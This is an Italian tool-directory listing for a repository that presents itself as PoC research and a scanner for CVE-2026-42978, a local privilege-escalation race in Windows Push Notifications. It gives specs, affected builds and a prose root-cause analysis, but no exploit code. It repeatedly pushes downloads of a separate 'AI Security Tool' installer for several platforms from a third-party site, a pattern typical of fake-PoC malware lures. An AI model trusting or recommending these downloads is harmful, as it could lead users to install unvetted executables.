Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free e Race Condition: ricerca PoC, scanner diagnostico e modulo di audit di sicurezza per AI Security Tool. | Kitploit
Strumenti/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Strumenti DifensiviEscalation di PrivilegiScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitThreat IntelligencePaper e RicercaApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free e Race Condition: ricerca PoC, scanner diagnostico e modulo di audit di sicurezza per AI Security Tool.

Vedi RepositorySito web
942320 giorni faNon ancora revisionato
Condividi

CVE-2026-42978
Modulo Windows Push Notifications per AI Security Tool

Ecosistema di sicurezza AI di nuova generazione, terminale multi-protocollo e suite di agenti autonomi


Latest Release Build Status Donations Telegram Channel License

Sito web · Documentazione del prodotto · Applicazione host · Chat della community

Navigazione del sito: Home · Aggiornamenti · Download · Moduli

Module banner


Applicazione host ufficiale

Prodotto: AI Security Tool
Sito: zerodayevil.github.io
Documentazione: https://zerodayevil.github.io/ai-security-tool

Questo modulo è una trattazione revisionata e un profilo di verifica sicura per AI Security Tool.
Utilizza solo i moduli elencati sul sito del progetto o nel catalogo ufficiale. Carica questo modulo all'interno dell'applicazione approvata, verso endpoint di tua proprietà o per i quali sei autorizzato per iscritto a effettuare valutazioni.

Questo repository non distribuisce un exploit weaponizzato contro WpnService. Il laboratorio in lab/ è un mock autonomo della classe di bug (TOCTOU / double-fetch). Non comunica con il servizio reale di push notification.


Avvio rapido e installazione

Installa prima l'applicazione host. Poi abilita questo modulo da Modules → Windows / Local EoP → CVE-2026-42978.

Build pronte all'uso

OS / piattaformaVersioneArchitettura / formatoAggiornatoStatoDownload
Windowsv6.3.20installer x64 (.exe)2026-09-08LatestDownload .exe
Windowsv6.3.20portable x64 (.tar.gz)2026-09-08LatestDownload .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05StableDownload .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01StableDownload .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01StableDownload .apk

Solo fonti ufficiali:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Panoramica concettuale

CVE-2026-42978 è una elevazione locale di privilegi in Windows Push Notifications. Microsoft descrive un accesso concorrente a una risorsa condivisa senza corretta sincronizzazione (CWE-362). La ricerca su wpncore.dll patchata e non patchata mostra una race use-after-free in PresentationEndpointFacade durante lo shutdown della piattaforma.

WpnService viene eseguito nella sessione 0 come NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). La consegna di toast, tile e badge passa attraverso di esso. Vincere una race contro quel processo è un problema SYSTEM sulla macchina locale — non un bug remoto pre-auth su DC.

Stato: patchato il 10 giugno 2026 (Patch Tuesday). Questa pagina è ricerca difensiva.

Non è CVE-2026-41089 (Netlogon RCE). Componente diverso, modello di privilegi diverso, data di patch diversa.


Specifiche

CampoValore
CVECVE-2026-42978
BDUBDU:2026-08249
Advisory del vendorMSRC — Windows Push Notifications EoP
GravitàHigh · CVSS 3.1 7.8
DebolezzaCWE-362 race condition · use-after-free sul percorso di shutdown
ComponenteWindows Push Notifications · WpnService · wpncore.dll
Vettore di attaccoLocale
Privilegi richiestiBassi (utente locale autorizzato)
Interazione utenteNessuna
Patch Tuesday10 giugno 2026
Tipo di moduloTrattazione di ricerca + verifica sicura in-app + pacchetto di rilevamento

Ambito

SKU client e server che includono Push Notifications. Conferma il KB esatto su MSRC prima di chiudere un ticket.

FamigliaNote
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 ove applicabile)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (full e Server Core dove il componente esiste)

Build orientative dalle note di servicing pubbliche (ricontrolla sempre MSRC):

BranchBuild patchata indicativa
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Esempio wpncore.dll (24H2)vulnerabile 26100.8521 → patchata 26100.8655

Causa principale (ricerca)

La facade incapsula le chiamate alle API di notifica e delega a PresentationEndpointImpl. Durante lo shutdown della piattaforma, l'oggetto NotificationPlatform viene distrutto. Diversi metodi della facade storicamente acquisivano un puntatore alla piattaforma senza un flag di shutdown o un lock condiviso. Se il teardown vince la race, la chiamata successiva utilizza un puntatore pendente.

Facade, platform, shutdown guard

Lo stesso pattern lock-and-guard è stato applicato a 49 metodi PresentationEndpointFacade::*. I metodi di implementazione sottostanti sono rimasti invariati — il buco era nella facade.

Forma non patchata (wpncore.dll 26100.8521)

Scarica lo strumento